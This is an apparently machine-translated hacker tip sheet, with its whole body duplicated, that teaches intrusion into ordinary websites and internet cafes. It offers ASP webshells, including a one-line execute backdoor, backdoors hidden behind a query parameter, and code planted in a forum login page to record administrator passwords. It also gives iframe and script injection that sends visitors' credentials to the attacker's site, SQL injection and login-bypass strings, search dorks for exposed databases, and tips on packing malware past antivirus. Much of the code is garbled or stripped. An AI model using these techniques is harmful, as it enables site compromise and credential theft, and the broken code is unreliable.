1. Name: How to make pictures ASP * (pictures can be displayed)
Create an asp file with the content <!--#i nclude file=""-->
Find a normal picture, insert a sentence * (such as Ice Fox's), use ultraedit to compile hex, insert it into the picture, for
After successful operation, you need to search <% and %> and turn it to 00 (do not replace your asp), and then add the beginning of the jpg file.
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval((#)+) </SCRIPT>
2. Name: Prank the Internet Cafe
First use the Jingrui Internet Cafe auxiliary tool to get the username and password, then use computer management to connect to a machine, open telnet, connect, and open sharing,
Just copy a * to run it.
3. Name: Feel the charm of MD5
The usage of rainbowcrack first uses rtgen to generate the library "rtgen md5 byte 1 7 5 2400 40000 all"
1 and 7 represent the minimum and maximum length of the password
I'll add another method: / Online crack
Or go to http:///?category=01-3&;searck=on
4. Many times we do *s without killing, and we don’t need to know assembly. We can escape the autopsy by using the Beidou shelling program. There are also many shelling software. Everyone can shell the *s.
It is best to choose more unknown shelling software.
5. Name: Hidden insertion type ASP *
(1) Add the following content to the asp file where we want to do things
<%if request("action")="ok" then%>
The shell code is inserted here, preferably a pony, and it needs to be encrypted.
<%end if%>
When accessing, add ?action=ok to the asp file you are wiggling and slapping.
(2) Another method: add the following content to the asp file where we want to do things.
<%
on error resume next
strFileName = ("filer")
set objStream = ("")
= 1
strFileName
(""),2
%>
When accessing, add ?filer=XXX after the asp file that is tampering with the problem.
XXX uploads a path for you locally such as c:
After uploading, there is ating, asp in the same folder as the asp that is doing tampering.
(3) The premise is to obtain system permissions,
Enter the next level of the website directory
mkdir s…
copy s…/
This antivirus software cannot be found
Just visit http://website/s…/
6. Tool/, this tool generates a super user on the computer. The user name is:
hack password 110, the user you created cannot be seen under DOS and on the computer manager, and it cannot be deleted.
7. Name: QQ group script attack
Open the QQ dialogue, copy the message, and then
Save the following content as a .vbs file and run
Set WshShell= ("")
"QQ Information Attack Script"
for i=1 to 20
1000
"^v"
i
"%s"
Next
8. Search: Program production: Wan Peng If you have free application space, just upload the Asp Horse directly
9. Name: Find out the ASP * on your site comprehensively
(1) Use antivirus software
(2) Use the FTP client software, click "Tools"->"Compare Folders"
(3) Use asplist2. Upload it to the site space to view. Generally, ASPs with many functions are probably ASP *s.
(4) Use the tool Beyond Compare
10 Name: Expand the idea of getting a DVBBS account "One person's Bible" animation
(1) In the past, after obtaining the webshell, I wanted to enter the background of DVBBS and wanted the administrator's password. This is how.
Old method:
Modify admin_login.asp to get the plaintext DVBBS background password
After the line "username=trim(replace(request("username")
Dim fsoObject
Dim tsObject
Set fsoObject = ("")
set tsObject = ((""))
CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
As long as the administrator logs into the background, it will be generated in the directory.
(2) Case "login_chk" below:
on error resume next
Dim rain
set rain=("")
=2
="gb2312"
=
("")
now&request("username")&"text:"&request("password")&chr(10)
(""),2
set rain=nothing
This will obtain the login time, username and password of all logged in.
(3) If you have your own website or another webshell (strongly recommended):
You can create a directory laner, and create an empty and following code inside:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=("")
=2
="gb2312"
=
("")
now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
(""),2
set rain=nothing
end if%>
11. Name: Use QQ online to catch pigeons and broilers
Generate the QQ online status, change the address inside to the * address, and send it to the forum
Insert a sentence there:
"<scriptsrc=/laner/?n="&request("username")
&""&"&p="&request("password")&"></script>"
"<iframesrc=http://yourwebsite/laner/?n="&request("username")
&""&"&p="&request("password")&"></iframe>"
As a result, all logged in will obediently send your name and password to you
12. Animation name: There are many loopholes in the entire media site program.
Vulnerability Program: Media China Full Site Program (First Edition)
Official website:/
Vulnerability: %5c (burst library) Upload, Injection
Upload page: down1/
13. Name: Free call + MSH command line tool
http:/// Open the home page, click on the seating corner, Free DownLoad, download to local, install,
After running, it will be prompted that the area code of your area is being searched for. Since it is international long distance, register an account and get 100 cents, domestic timekeeping
0.01/min, you will have 100 minutes to play for free. It's an account.
It should be noted that the landline telephone and Xiaolingtong form is 0086521123456 521 Originally 0521, the previous zero must be omitted, and the mobile phone number must be also
It's the same.
14. Name: New vulnerability in Bo-Blog
http://website/?job=../admin/ban
Save the part of "forbidden search" in it, change the address inside it, insert a * horse
16. Program: Hongda Enterprise’s entire website upload vulnerability
Official homepage: http:///
Vulnerability page:/cx/ (Upload vulnerability)
17. In the password change, add or=or to the username and password
18. Name: bbsxp5.16 background gets webshell
bbsxp5.16 filters file uploads with asp, asp, cdx, cer, and extensions. Even if you add the upload type to the basic settings, it is not OK and it is prohibited.
To modify the data backup data name, we can save this web page locally and upload the source code.
19. Name: JHACKJ 2005 latest classic tutorial
Download and take a look, it's good, it's available on all major websites
20. Name: Save effort to invade Korean broiler
In Ah D's scan injection point item, open this: /advanced_search?hl=zh-CN
This is an advanced search term, and you can write keywords at will. Here I write asp?name= set to display 100 items per page.
Language selection Korean. Search, many sa.
twenty one. Name: cracked by any Internet cafe management system
Select smart ABC, then enter vv, take two steps back, press the delete key to delete the two vvs you just entered
Finally press the Inter key
twenty two. Name: Cracking the code of QQ space inserting web *
Tencent has now blocked a lot of QQ space codes, just like before <iframe src="* address" name="lcx" width="0"
height="0" frameborder="0"></iframe>The code for inserting the web * has long been blocked.
The code for breaking through disable is as follows:
<div id=DI><img src="javascript :=\<iframe src=* address width=190 height=190
marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"
style=display:none></div>
Finally, Kara is a summary of OK
1. Upload vulnerability [No more talk about]
pS: If you see: Select the file you want to upload [Re-upload] or "Please log in and use it" appears, 80% of them will have a vulnerability!
Sometimes uploading may not be successful, because cookies are different. We need to use WSockExpert to obtain cookies and then upload them with DOMAIN.
2. Injecting vulnerabilities [No more talk]
pS: For MD5 password. Sometimes it is not easy for us to run out. If it is [SQL database], then we can use the following command:
http://inject URL; update admin set password=\new MD5 password\ where password=\old MD5 password\--
[admin is the table name.]
3. Side note, that is, cross-site.
When we invade a certain site, the site may be solid and impeccable. We can find the site with the same server as the site and then use this site.
Sites use power-elevation, sniffing and other methods to invade the site we want to invade. , There is a difficulty here, which is the absolute path of some servers
Over-encryption, it depends on our ability.
4. Blast library: Change / in the middle of the secondary directory to %5c
EY:/otherweb/dz/bgs/?BigClassName=Scope of Responsibilities&BigClassType=1
If you can see:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\ is not a valid path. Confirm the way
Is the path name spelled correctly and is connected to the server where the file is stored.
This is the database. When downloading, just use FLASHGET to .MDB format.
5.\or\=\or\This is a famous saying that can connect to SQL. You can directly enter the background. I collected it. Similar ones:
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a
6. Social Engineering. We all know this. Just guess.
EY:/waishi/admin
admin waishi
7. Write to the ASP format database. It is just a sentence * [<%execute request("value")%> ], which is commonly used in the message book.
EY: /ebook/db/[This is an ASP format database], write another sentence
*
8. Source code utilization: Some websites use source code downloaded online. Some webmasters are very naive and do not change anything.
EY:/xiaoyoulu/
This site uses: Outstanding Alumni Record, I have downloaded the source code,
Default database/webshell path: databaseliangu_data.mdb Backend management: adm_login.asp Password and username are both
admin
9. Default database/webshell path utilization: There are many such websites/wEBSHELL that benefit others.
/Databackup/
/bbs/Databackup/
/bbs/Data/
/data/
/bbs/
/
/bbs/
/bbs/
/bbs/
/bbs/
Tools: Website Hunter Digging Chicken
EY:http:///bbs/Databackup/
10. View directory method: Some websites can disconnect the directory, and you can ask the directory.
EY:http:///shop/admin/
/babyfox/admin/%23bb%23dedsed2s/
In this way, we can find the database, so I don’t need to teach you how to download it.
11. Tool overflow:.asp?NewsID=/?id=18.asp?id=[This method can obtain a large amount of WEBSHELL]
12. Search engine utilization:
(1).inurl:flasher_list.asp Default database:database/ backend/manager/
(2). Find the website's management backend address:
site::Management
site::Management <There are many keywords, please look for it yourself>
site::login
(3). Find access database, mssql, mysql connection files
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
My Lord will not do it anymore. . Do it yourself. .
Deception: Change your ID to the administrator, and change the MD5 password to his. You can use the Guilin Veteran Tool to modify COOKIE.
I won't talk about this more
14. Take advantage of common vulnerabilities: Rudong.com BBS
EY:/bbs/
You can first use the :dvbbs permission enhancement tool to make yourself a front-end administrator.
THEN, use: Dynamic Net Fixed Top Sticker Tool, find a Fixed Top Sticker, and then obtain COOKIES, you have to do this yourself. We can use WSockExpert
Obtain Cookies/NC Package
I won’t do this anymore. There are many online tutorials, so I will take a look at it next.
Tools: dvbbs permission enhancement tool, dynamic network fixed top sticker tool
15. There are still some old loopholes. For example, IIS3, 4's view source code, 5's delete
I won’t talk about CGI, some old holes in PHP. . Too old. No big use.
Create an asp file with the content <!--#i nclude file=""-->
Find a normal picture, insert a sentence * (such as Ice Fox's), use ultraedit to compile hex, insert it into the picture, for
After successful operation, you need to search <% and %> and turn it to 00 (do not replace your asp), and then add the beginning of the jpg file.
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval((#)+) </SCRIPT>
2. Name: Prank the Internet Cafe
First use the Jingrui Internet Cafe auxiliary tool to get the username and password, then use computer management to connect to a machine, open telnet, connect, and open sharing,
Just copy a * to run it.
3. Name: Feel the charm of MD5
The usage of rainbowcrack first uses rtgen to generate the library "rtgen md5 byte 1 7 5 2400 40000 all"
1 and 7 represent the minimum and maximum length of the password
I'll add another method: / Online crack
Or go to http:///?category=01-3&;searck=on
4. Many times we do *s without killing, and we don’t need to know assembly. We can escape the autopsy by using the Beidou shelling program. There are also many shelling software. Everyone can shell the *s.
It is best to choose more unknown shelling software.
5. Name: Hidden insertion type ASP *
(1) Add the following content to the asp file where we want to do things
<%if request("action")="ok" then%>
The shell code is inserted here, preferably a pony, and it needs to be encrypted.
<%end if%>
When accessing, add ?action=ok to the asp file you are wiggling and slapping.
(2) Another method: add the following content to the asp file where we want to do things.
<%
on error resume next
strFileName = ("filer")
set objStream = ("")
= 1
strFileName
(""),2
%>
When accessing, add ?filer=XXX after the asp file that is tampering with the problem.
XXX uploads a path for you locally such as c:
After uploading, there is ating, asp in the same folder as the asp that is doing tampering.
(3) The premise is to obtain system permissions,
Enter the next level of the website directory
mkdir s…
copy s…/
This antivirus software cannot be found
Just visit http://website/s…/
6. Tool/, this tool generates a super user on the computer. The user name is:
hack password 110, the user you created cannot be seen under DOS and on the computer manager, and it cannot be deleted.
7. Name: QQ group script attack
Open the QQ dialogue, copy the message, and then
Save the following content as a .vbs file and run
Set WshShell= ("")
"QQ Information Attack Script"
for i=1 to 20
1000
"^v"
i
"%s"
Next
8. Search: Program production: Wan Peng If you have free application space, just upload the Asp Horse directly
9. Name: Find out the ASP * on your site comprehensively
(1) Use antivirus software
(2) Use the FTP client software, click "Tools"->"Compare Folders"
(3) Use asplist2. Upload it to the site space to view. Generally, ASPs with many functions are probably ASP *s.
(4) Use the tool Beyond Compare
10 Name: Expand the idea of getting a DVBBS account "One person's Bible" animation
(1) In the past, after obtaining the webshell, I wanted to enter the background of DVBBS and wanted the administrator's password. This is how.
Old method:
Modify admin_login.asp to get the plaintext DVBBS background password
After the line "username=trim(replace(request("username")
Dim fsoObject
Dim tsObject
Set fsoObject = ("")
set tsObject = ((""))
CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
As long as the administrator logs into the background, it will be generated in the directory.
(2) Case "login_chk" below:
on error resume next
Dim rain
set rain=("")
=2
="gb2312"
=
("")
now&request("username")&"text:"&request("password")&chr(10)
(""),2
set rain=nothing
This will obtain the login time, username and password of all logged in.
(3) If you have your own website or another webshell (strongly recommended):
You can create a directory laner, and create an empty and following code inside:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=("")
=2
="gb2312"
=
("")
now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
(""),2
set rain=nothing
end if%>
11. Name: Use QQ online to catch pigeons and broilers
Generate the QQ online status, change the address inside to the * address, and send it to the forum
Insert a sentence there:
"<scriptsrc=/laner/?n="&request("username")
&""&"&p="&request("password")&"></script>"
"<iframesrc=http://yourwebsite/laner/?n="&request("username")
&""&"&p="&request("password")&"></iframe>"
As a result, all logged in will obediently send your name and password to you
12. Animation name: There are many loopholes in the entire media site program.
Vulnerability Program: Media China Full Site Program (First Edition)
Official website:/
Vulnerability: %5c (burst library) Upload, Injection
Upload page: down1/
13. Name: Free call + MSH command line tool
http:/// Open the home page, click on the seating corner, Free DownLoad, download to local, install,
After running, it will be prompted that the area code of your area is being searched for. Since it is international long distance, register an account and get 100 cents, domestic timekeeping
0.01/min, you will have 100 minutes to play for free. It's an account.
It should be noted that the landline telephone and Xiaolingtong form is 0086521123456 521 Originally 0521, the previous zero must be omitted, and the mobile phone number must be also
It's the same.
14. Name: New vulnerability in Bo-Blog
http://website/?job=../admin/ban
Save the part of "forbidden search" in it, change the address inside it, insert a * horse
16. Program: Hongda Enterprise’s entire website upload vulnerability
Official homepage: http:///
Vulnerability page:/cx/ (Upload vulnerability)
17. In the password change, add or=or to the username and password
18. Name: bbsxp5.16 background gets webshell
bbsxp5.16 filters file uploads with asp, asp, cdx, cer, and extensions. Even if you add the upload type to the basic settings, it is not OK and it is prohibited.
To modify the data backup data name, we can save this web page locally and upload the source code.
19. Name: JHACKJ 2005 latest classic tutorial
Download and take a look, it's good, it's available on all major websites
20. Name: Save effort to invade Korean broiler
In Ah D's scan injection point item, open this: /advanced_search?hl=zh-CN
This is an advanced search term, and you can write keywords at will. Here I write asp?name= set to display 100 items per page.
Language selection Korean. Search, many sa.
twenty one. Name: cracked by any Internet cafe management system
Select smart ABC, then enter vv, take two steps back, press the delete key to delete the two vvs you just entered
Finally press the Inter key
twenty two. Name: Cracking the code of QQ space inserting web *
Tencent has now blocked a lot of QQ space codes, just like before <iframe src="* address" name="lcx" width="0"
height="0" frameborder="0"></iframe>The code for inserting the web * has long been blocked.
The code for breaking through disable is as follows:
<div id=DI><img src="javascript :=\<iframe src=* address width=190 height=190
marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"
style=display:none></div>
Finally, Kara is a summary of OK
1. Upload vulnerability [No more talk about]
pS: If you see: Select the file you want to upload [Re-upload] or "Please log in and use it" appears, 80% of them will have a vulnerability!
Sometimes uploading may not be successful, because cookies are different. We need to use WSockExpert to obtain cookies and then upload them with DOMAIN.
2. Injecting vulnerabilities [No more talk]
pS: For MD5 password. Sometimes it is not easy for us to run out. If it is [SQL database], then we can use the following command:
http://inject URL; update admin set password=\new MD5 password\ where password=\old MD5 password\--
[admin is the table name.]
3. Side note, that is, cross-site.
When we invade a certain site, the site may be solid and impeccable. We can find the site with the same server as the site and then use this site.
Sites use power-elevation, sniffing and other methods to invade the site we want to invade. , There is a difficulty here, which is the absolute path of some servers
Over-encryption, it depends on our ability.
4. Blast library: Change / in the middle of the secondary directory to %5c
EY:/otherweb/dz/bgs/?BigClassName=Scope of Responsibilities&BigClassType=1
If you can see:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\ is not a valid path. Confirm the way
Is the path name spelled correctly and is connected to the server where the file is stored.
This is the database. When downloading, just use FLASHGET to .MDB format.
5.\or\=\or\This is a famous saying that can connect to SQL. You can directly enter the background. I collected it. Similar ones:
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a
6. Social Engineering. We all know this. Just guess.
EY:/waishi/admin
admin waishi
7. Write to the ASP format database. It is just a sentence * [<%execute request("value")%> ], which is commonly used in the message book.
EY: /ebook/db/[This is an ASP format database], write another sentence
*
8. Source code utilization: Some websites use source code downloaded online. Some webmasters are very naive and do not change anything.
EY:/xiaoyoulu/
This site uses: Outstanding Alumni Record, I have downloaded the source code,
Default database/webshell path: databaseliangu_data.mdb Backend management: adm_login.asp Password and username are both
admin
9. Default database/webshell path utilization: There are many such websites/wEBSHELL that benefit others.
/Databackup/
/bbs/Databackup/
/bbs/Data/
/data/
/bbs/
/
/bbs/
/bbs/
/bbs/
/bbs/
Tools: Website Hunter Digging Chicken
EY:http:///bbs/Databackup/
10. View directory method: Some websites can disconnect the directory, and you can ask the directory.
EY:http:///shop/admin/
/babyfox/admin/%23bb%23dedsed2s/
In this way, we can find the database, so I don’t need to teach you how to download it.
11. Tool overflow:.asp?NewsID=/?id=18.asp?id=[This method can obtain a large amount of WEBSHELL]
12. Search engine utilization:
(1).inurl:flasher_list.asp Default database:database/ backend/manager/
(2). Find the website's management backend address:
site::Management
site::Management <There are many keywords, please look for it yourself>
site::login
(3). Find access database, mssql, mysql connection files
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
My Lord will not do it anymore. . Do it yourself. .
Deception: Change your ID to the administrator, and change the MD5 password to his. You can use the Guilin Veteran Tool to modify COOKIE.
I won't talk about this more
14. Take advantage of common vulnerabilities: Rudong.com BBS
EY:/bbs/
You can first use the :dvbbs permission enhancement tool to make yourself a front-end administrator.
THEN, use: Dynamic Net Fixed Top Sticker Tool, find a Fixed Top Sticker, and then obtain COOKIES, you have to do this yourself. We can use WSockExpert
Obtain Cookies/NC Package
I won’t do this anymore. There are many online tutorials, so I will take a look at it next.
Tools: dvbbs permission enhancement tool, dynamic network fixed top sticker tool
15. There are still some old loopholes. For example, IIS3, 4's view source code, 5's delete
I won’t talk about CGI, some old holes in PHP. . Too old. No big use.